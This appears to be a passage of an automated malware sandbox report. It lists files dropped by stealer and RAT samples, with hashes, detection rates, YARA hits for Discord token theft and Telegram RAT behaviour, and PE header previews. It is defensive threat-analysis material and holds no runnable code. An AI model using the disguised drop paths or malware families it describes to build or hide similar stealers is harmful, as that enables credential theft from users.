Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\main.exe	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse
C:\ProgramData\setup.exe	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse
C:\ProgramData\setup.exe	hacn.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT, Xmrig	Browse
C:\Program Files\Google\Chrome\updater.exe	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse
C:\Program Files\Google\Chrome\updater.exe	hacn.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT, Xmrig	Browse
C:\ProgramData\Microsoft\hacn.exe	DevxExecutor.exe	Get hash	malicious	Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: DevxExecutor.exe, Detection: malicious, Browse Filename: hacn.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\ProgramData\Microsoft\based.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	7759042
Entropy (8bit):	7.993196079580177
Encrypted:	true
SSDEEP:	196608:trqeP9VnJurErvI9pWjgfPvzm6gsFEB4Aut:Hl3urEUWjC3zDb84Aut
MD5:	363F8437904AD603ECDF0D5329610D88
SHA1:	1EF9F6E50F91296C15D600EE6B42C60E70597A0A
SHA-256:	25E8567BD4DAB1C168821CD06E9D17441289CE638B785C0A6D0F00480F688B62
SHA-512:	D62D59B4F5980BAC4F013F395DBD0AEB9002657E3794C9E7CF4DC9072E4B4F31E1182C2BA9D1496293449AEA658A1BCABE0BA353B0DD0653AAAE768C39829FE9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 51%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d...A.Uf.........."....&.....v......@..........@......................................v...`.....................................................x....p.......0...#..z@v.H$......X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..X............"..............@..B........................................................................................................................................................................................

C:\ProgramData\Microsoft\hacn.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	25152315
Entropy (8bit):	7.999194335744512
Encrypted:	true
SSDEEP:	393216:IDfDoc6/4m7/VBPt2XP8b/B+6M+8TIZ/iy1K4yoJq1HmnlOUyv5fkpHwsX:Ib7QvBt2XP8DB+DlSJ1K4y5PhSQ
MD5:	B9F3E6E06F33EE7078F514D41BE5FAAD
SHA1:	E2D35BC333EC6FF0F6AE60E55DACA44A433FC279
SHA-256:	A7C3208CF3067D1DA12542CAB16516C9085620959DEB60DD000E190F15C74758
SHA-512:	212A6540082A20DE6798D53E2C6F7F5705E5E4164620AA7F08A366E747F240C59C4C70CE0B8DD00625A0A960D1615073B4E48B2707ABE767B422F732C5927BED
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 67%
Joe Sandbox View:	Filename: DevxExecutor.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....];f.........."....%.....p.................@..........................................`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................

C:\ProgramData\main.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5872344
Entropy (8bit):	7.487098820179109
Encrypted:	false
SSDEEP:	98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR65:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciN
MD5:	5DF3E2C717F267899F37EC6E8FC7F47A
SHA1:	5E980079F67215BF69B8C1C16B56F40BF4A29958
SHA-256:	E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
SHA-512:	8CEF1184120E010421D69FCF271822B3F0B45E34A1565152A3F2DECB8F500D0E69DE9816D9075683FCFB0F431713F3FBC42AC2D87503CDCDDE125ABA3FA1635D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: DevxExecutor.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(......(......{...."..}......F.{....o....s.......2...{....o..../..{.....o.....s,......(....,.(........2...{....o....2..{.....o.....{......o......s,...v..(....,.(.......{.....o....2.{....o.......2...{....o....2...{.....o.....{.....o....>.{.....o....&...0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s

C:\ProgramData\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: DevxExecutor.exe, Detection: malicious, Browse Filename: hacn.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\ProgramData\svchost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12576970
Entropy (8bit):	7.995050972613473
Encrypted:	true
SSDEEP:	196608:HWweM4sJFPpGAjMGhuPD5U4iDfyGgVwBdnpkYRMoSENsS3Mcj0kilsl:0SP8AxYDMDfDgVc6J4pMcj9Wsl
MD5:	48B277A9AC4E729F9262DD9F7055C422
SHA1:	D7E8A3FA664E863243C967520897E692E67C5725
SHA-256:	5C832EDA59809A4F51DC779BB00BD964AAD42F2597A1C9F935CFB37F0888EF17
SHA-512:	66DD4D1A82103CD90C113DF21EB693A2BFFDE2CDE41F9F40B5B85368D5A920B66C3BC5CADAF9F9D74DFD0F499086BEDD477F593184A7F755B7B210EF5E428941
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-................,..............................................Rich...................PE..d...5L;f.........."....&.....r......0..........@....................................dy....`.....................................................x....p..e....0...#..............X...@...................................@............... ............................text............................... ..`.rdata...........0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc...e....p......................@..@.reloc..X...........................@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\main.exe.log

Download File

Process:	C:\ProgramData\main.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1678
Entropy (8bit):	5.369913341429046
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6ogLHitHTHhAHKKkyHpHNp51qHGIs0HKD:iqbYqGSI6ogLCtzHeqKkyJtp5wmj0qD
MD5:	47EF549ED9A6077539E2B7E16049BF8F
SHA1:	2129E12D767465A7F083AB906EB481DB88B47D0E
SHA-256:	ABACC0BCEB0B100C7FDC2DDDF3CDDCCB8C048466FD886D0A015AB49D5B0A38A7
SHA-512:	EB77CA4097CD1F268E6462D7FA3F864700B7113A637C755FCFF843A01DE6088A7B3588D2CFD1C6C9F018E93783019E338793E7EC5FC29BDBCE6E6604AEB91A99
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKey

C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

Download File

Process:	C:\Windows\System32\lsass.exe
File Type:	very short file (no magic)
Category:	modified
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	93B885ADFE0DA089CDF634904FD59F71
SHA1:	5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
SHA-256:	6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
SHA-512:	B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:Nlllulbnolz:NllUc
MD5:	F23953D4A58E404FCB67ADD0C45EB27A
SHA1:	2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256:	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512:	B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll

Download File

Process:	C:\ProgramData\main.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1829040
Entropy (8bit):	6.564424655402829
Encrypted:	false
SSDEEP:	49152:c9EeNSPwEW3cFSI4Tfm3hvbHsjAJcAMkP3:c9Nzm31PMo3
MD5:	65CCD6ECB99899083D43F7C24EB8F869
SHA1:	27037A9470CC5ED177C0B6688495F3A51996A023
SHA-256:	ABA67C7E6C01856838B8BC6B0BA95E864E1FDCB3750AA7CDC1BC73511CEA6FE4
SHA-512:	533900861FE36CF78B614D6A7CE741FF1172B41CBD5644B4A9542E6CA42702E6FBFB12F0FBAAE8F5992320870A15E90B4F7BF180705FC9839DB433413860BE6D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nN\.. ... ... .Q..... .Q...e. .Q..... ..Q#... ..Q%... ..Q$... .8..... ..].... ...!.~. .rQ(... .rQ ... .wQ.... .rQ"... .Rich.. .........................PE..d.....d.........." ................................................................6U....`.................................................P...x................!.......T...........@..p............................A...............................................text...0........................... ..`.rdata...1.......2..................@..@.data....`... ...J..................@....pdata...!......."...P..............@..@.gfids...............r..............@..@.rsrc................t..............@..@.reloc...............~..............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_brotli.cp310-win_amd64.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	820736
Entropy (8bit):	6.056282443190043
Encrypted:	false
SSDEEP:	12288:tY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfRFo:tp0NA1tAmZfR
MD5:	EE3D454883556A68920CAAEDEFBC1F83
SHA1:	45B4D62A6E7DB022E52C6159EEF17E9D58BEC858
SHA-256:	791E7195D7DF47A21466868F3D7386CFF13F16C51FCD0350BF4028E96278DFF1
SHA-512:	E404ADF831076D27680CC38D3879AF660A96AFC8B8E22FFD01647248C601F3C6C4585D7D7DC6BBD187660595F6A48F504792106869D329AA1A0F3707D7F777C6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.r.q...q...q...x...y......s...:...s......\|......y......r.....r...q...L.....Q.....p.....p.....p...Richq...........PE..d... ..d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_bz2.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83736
Entropy (8bit):	6.595094797707322
Encrypted:	false
SSDEEP:	1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
MD5:	86D1B2A9070CD7D52124126A357FF067
SHA1:	18E30446FE51CED706F62C3544A8C8FDC08DE503
SHA-256:	62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
SHA-512:	7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_cffi_backend.cp310-win_amd64.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	181248
Entropy (8bit):	6.188683787528254
Encrypted:	false
SSDEEP:	3072:rZ1fKD8GVLHASq0TTjfQxnkVB0hcspEsHS7iiSTLkKetJb9Pu:rZNRGVb9TTCnaZsuMXiSTLLeD9
MD5:	EBB660902937073EC9695CE08900B13D
SHA1:	881537ACEAD160E63FE6BA8F2316A2FBBB5CB311
SHA-256:	52E5A0C3CA9B0D4FC67243BD8492F5C305FF1653E8D956A2A3D9D36AF0A3E4FD
SHA-512:	19D5000EF6E473D2F533603AFE8D50891F81422C59AE03BEAD580412EC756723DC3379310E20CD0C39E9683CE7C5204791012E1B6B73996EA5CB59E8D371DE24
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih..-..C-..C-..C$qMC!..C.\|.B/..CKf#C)..C.\|.B&..C.\|.B%..C.\|.B)..Cfq.B)..C.\|.B...C-..C...C.\|.B)..C$qKC,..C.\|.B,..C.\|!C,..C.\|.B,..CRich-..C........PE..d.....e.........." .........@...............................................0............`..........................................g..l...\|g..................H............ .......M...............................M..8............................................text...h........................... ..`.rdata..l...........................@..@.data....\.......0...v..............@....pdata..H...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_ctypes.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	123672
Entropy (8bit):	6.047035801914277
Encrypted:	false
SSDEEP:	3072:0OEESRiaiH6lU1vxqfrId0sx3gVILLPykxA:hj+I1vAfrIRx3gN
MD5:	1635A0C5A72DF5AE64072CBB0065AEBE
SHA1:	C975865208B3369E71E3464BBCC87B65718B2B1F
SHA-256:	1EA3DD3DF393FA9B27BF6595BE4AC859064CD8EF9908A12378A6021BBA1CB177
SHA-512:	6E34346EA8A0AACC29CCD480035DA66E280830A7F3D220FD2F12D4CFA3E1C03955D58C0B95C2674AEA698A36A1B674325D3588483505874C2CE018135320FF99
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............d...d...d.......d...e...d...a...d...`...d...g...d.d.e...d...`...d...e...d.:.e...d...e.I.d.d.i...d.d.d...d.d...d.d.f...d.Rich..d.........................PE..d.....,d.........." ................@Z..............................................!.....`..........................................P.......P..................D......../..............T...........................0...8...............H............................text............................... ..`.rdata...k.......l..................@..@.data...T>...p...8...\..............@....pdata..D...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_decimal.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	254744
Entropy (8bit):	6.564308911485739
Encrypted:	false
SSDEEP:	6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
MD5:	20C77203DDF9FF2FF96D6D11DEA2EDCF
SHA1:	0D660B8D1161E72C993C6E2AB0292A409F6379A5
SHA-256:	9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
SHA-512:	2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....\|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......\|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...\|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_hashlib.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64792
Entropy (8bit):	6.223467179037751
Encrypted:	false
SSDEEP:	1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
MD5:	D4674750C732F0DB4C4DD6A83A9124FE
SHA1:	FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
SHA-256:	CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
SHA-512:	97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_lzma.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158488
Entropy (8bit):	6.8491143497239655
Encrypted:	false
SSDEEP:	3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
MD5:	7447EFD8D71E8A1929BE0FAC722B42DC
SHA1:	6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
SHA-256:	60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
SHA-512:	C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_pytransform.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1165824
Entropy (8bit):	7.0564514753444785
Encrypted:	false
SSDEEP:	24576:LsZDXB6wmcZzdcZ7fUoPHUEXLznTTenIGHSQt:QZDXB6wmcUfTKHHt
MD5:	0359DFA90FFB2E190C91A4DE76E36BF7
SHA1:	E4FFFAC0206C2E41B44898AAA49583212F406DEE
SHA-256:	22C1CA2F788196DF27FDBE4A9B36CB7CBAE51CD38CF1C1ABF44BAD66CC82C236
SHA-512:	AEC3EAE25FC4CEE3A1B6A9304369CEE8DA5CCC771971456B1FF0F750BB17C9BA038B26CAAF2421ACBB40AE9C4D79275C0D04045098D188926C84E25C532ABBD0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d..................".....b..........0..........p.....................................[........ .........................................+........................'...........................................`..(...................d................................text...ha.......b..................`.P`.data................f..............@.`..rdata..p............h..............@.`@.pdata...'.......(...V..............@.0@.xdata..L,...........~..............@.0@.bss....h.............................`..edata..+...........................@.0@.idata..............................@.0..CRT....X...........................@.@..tls................................@.@..reloc..............................@.0B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_queue.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	31512
Entropy (8bit):	6.563116725717513
Encrypted:	false
SSDEEP:	768:bxrUGCpa6rIxdK/rAwVILQU85YiSyvz5PxWEaAc:trUZIzYrAwVILQUG7SydPxDc
MD5:	D8C1B81BBC125B6AD1F48A172181336E
SHA1:	3FF1D8DCEC04CE16E97E12263B9233FBF982340C
